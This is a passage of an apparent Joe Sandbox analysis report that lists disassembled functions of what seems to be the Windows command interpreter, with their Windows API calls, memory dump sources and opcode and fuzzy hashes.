                                        • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                        • Instruction Fuzzy Hash: 28412A21B0CA4392FA54BF56E854635F2A6AB64364F840475DF7E836A0FF3CEA408760
                                        Function 00007FF7CD494A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1207 7ff7cd494a14-7ff7cd494a3e GetEnvironmentStringsW 1208 7ff7cd494a40-7ff7cd494a46 1207->1208 1209 7ff7cd494aae-7ff7cd494ac5 1207->1209 1210 7ff7cd494a48-7ff7cd494a52 1208->1210 1211 7ff7cd494a59-7ff7cd494a8f GetProcessHeap HeapAlloc 1208->1211 1210->1210 1212 7ff7cd494a54-7ff7cd494a57 1210->1212 1213 7ff7cd494a9f-7ff7cd494aa9 FreeEnvironmentStringsW 1211->1213 1214 7ff7cd494a91-7ff7cd494a9a memmove 1211->1214 1212->1210 1212->1211 1213->1209 1214->1213
                                        APIs
                                        • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                        • memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                        • String ID:
                                        • API String ID: 1623332820-0
                                        • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                        • Instruction ID: 9fcb93c2cd7292d546464a98fe52d482dbf1a45eb43bffc32bc547e889ee94d9
                                        • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                        • Instruction Fuzzy Hash: F4119421B19B5182DE10AF87B404039FBE5EB89FE0B899038DF5E03744EE3DE5418754
                                        Function 00007FF7CD495CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD4AC9EE,?,?,?,00007FF7CD4AEA6C,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD495CCB
                                        • GetExitCodeProcess.KERNELBASE(?,?,00000000,00007FF7CD4AC9EE,?,?,?,00007FF7CD4AEA6C,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD495CDF
                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7CD495D03
                                        • fprintf.MSVCRT ref: 00007FF7CD49F4A9
                                        • fflush.MSVCRT ref: 00007FF7CD49F4C2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                        • String ID:
                                        • API String ID: 1826527819-0
                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                        • Instruction ID: 9dc8317a1de584d270973856201a4efd1fc7ed60b19a5814ba1f78276d8a0196
                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                        • Instruction Fuzzy Hash: 88015221B0CA429AEA047F56A444178FE61EB5A761FC46170DE6F06355EF3C91448B20
                                        Function 00007FF7CD493060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD491EA0: wcschr.MSVCRT(?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7CD4B0D54), ref: 00007FF7CD491EB3
                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7CD4892AC), ref: 00007FF7CD4930CA
                                        • SetErrorMode.KERNELBASE ref: 00007FF7CD4930DD
                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4930F6
                                        • SetErrorMode.KERNELBASE ref: 00007FF7CD493106
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorMode$FullNamePathwcschr
                                        • String ID:
                                        • API String ID: 1464828906-0
                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                        • Instruction ID: ac25019f9a086734ea65ca7854a2d03bef520ecf219e55c45c08863e416080cb
                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                        • Instruction Fuzzy Hash: 4531B121B0C65186E724AF56A40487EF666EB46BB0FD88135DF6A433E0FE7DEA458310
                                        Function 00007FF7CD48CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                        • API String ID: 2221118986-3416068913
                                        • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                        • Instruction ID: 456e0d7ef2fa96da204cd4c8e6b2dc9efae1961007f89ff22fde948ce0e5b69f
                                        • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                        • Instruction Fuzzy Hash: B911C621B0CA4281EF54EF56A5543B9A2919F88BF4F984231DF7D4B7D5FE2CD6804320
                                        Function 00007FF7CD48BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memsetwcschr
                                        • String ID: 2$COMSPEC
                                        • API String ID: 1764819092-1738800741
                                        • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                        • Instruction ID: d1c33f23c626ab1afd69d19803f46a345b10e057b62c44db5503088fa6b027fb
                                        • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                        • Instruction Fuzzy Hash: E0516721B0C7424DFB61BE21A841379A3959F947E4F884031DF2DC2296FF2CEA84C762
                                        Function 00007FF7CD492EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                        • String ID:
                                        • API String ID: 4254246844-0
                                        • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                        • Instruction ID: 9e03c497e47dd2db37088e7519ea907d38cebee0077392523d1912e4a6183d46
                                        • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                        • Instruction Fuzzy Hash: F941B521B0D64286EA10AF02E444B79FBA6EF85774FC84531DF6D47789FE3CE6458620
                                        Function 00007FF7CD49498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$EnvironmentFreeProcessVariable
                                        • String ID:
                                        • API String ID: 2643372051-0
                                        • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                        • Instruction ID: 72132c771c915d95690a7f4e91faf661eb74fd82ae95d44ea265b864f1bfeb28
                                        • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                        • Instruction Fuzzy Hash: 4EF04471B1DA4185DA00AF76E404075EAA2FF99770B959234CE7D03390EE3C95448110
                                        Function 00007FF7CD495A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$ConsoleMode
                                        • String ID:
                                        • API String ID: 1591002910-0
                                        • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                        • Instruction ID: 3ee5a69df7da1185df661c73517019a5d84c8c06ae35e008189bc65897c6b89d
                                        • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                        • Instruction Fuzzy Hash: 28F07A35B0DA02DBE604AF91E845078BBA1FBD9721F844135CF1E43310EF3CA6058B10
                                        Function 00007FF7CD49291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: DriveType
                                        • String ID: :
                                        • API String ID: 338552980-336475711
                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                        • Instruction ID: 87b4f97b760e773a23a39c48b0277e9dea9a196d5fc726670a0d5a5fb18d96fb
                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                        • Instruction Fuzzy Hash: 24E0E56371CA0086D7209F50E05106AF761FB9C318FC41524DE9D83724EB3CC249CB08
                                        Function 00007FF7CD495AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF7CD495B52
                                          • Part of subcall function 00007FF7CD494224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD494297
                                          • Part of subcall function 00007FF7CD494224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD4942D7
                                          • Part of subcall function 00007FF7CD494224: memset.MSVCRT ref: 00007FF7CD4942FD
                                          • Part of subcall function 00007FF7CD494224: memset.MSVCRT ref: 00007FF7CD494368
                                          • Part of subcall function 00007FF7CD494224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7CD494380
                                          • Part of subcall function 00007FF7CD494224: wcsrchr.MSVCRT ref: 00007FF7CD4943E6
                                          • Part of subcall function 00007FF7CD494224: lstrcmpW.KERNELBASE ref: 00007FF7CD494401
                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7CD495BC7
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                        • String ID:
                                        • API String ID: 497088868-0
                                        • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                        • Instruction ID: 6f6469b6073026cebfd4c324978a8a0876d546d0810f3499dae31ddee4b5754b
                                        • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                        • Instruction Fuzzy Hash: 87319720B0C64242FA24BF12A45457DE296BF89BE0FD45031DF6E87B95FE3CE6028720
                                        Function 00007FF7CD499A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_taskmalloc
                                        • String ID:
                                        • API String ID: 1412018758-0
                                        • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                        • Instruction ID: 02aa12de019a37a8b458d10e0604f4885602a00dc45c2cf7b63cce609703c7a4
                                        • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                        • Instruction Fuzzy Hash: 56E06D00F1E64792FE243FA36882874925E9F68760E882430CF2D09382FE2CA6918330
                                        Function 00007FF7CD48CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                        • Instruction ID: 665d4d8a76e0bd1e3be719bd5617b54233f49474fe0f463b78125bab61b63f25
                                        • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                        • Instruction Fuzzy Hash: F2F01D31B1C64286EB04AF16F844078FBA5FB89B51B989434DE6E43754EF3CE641C710
                                        Function 00007FF7CD494C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: exit
                                        • String ID:
                                        • API String ID: 2483651598-0
                                        • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                        • Instruction ID: 0de905efbdc0fb956a2c68e44b535960376190e33aac867641d6b0a3cfe0dd51
                                        • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                        • Instruction Fuzzy Hash: 54C0123070C6465BEB2C7F726455439955A5B19211F45543CCF2A81282ED28D5058A14
                                        Function 00007FF7CD495508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
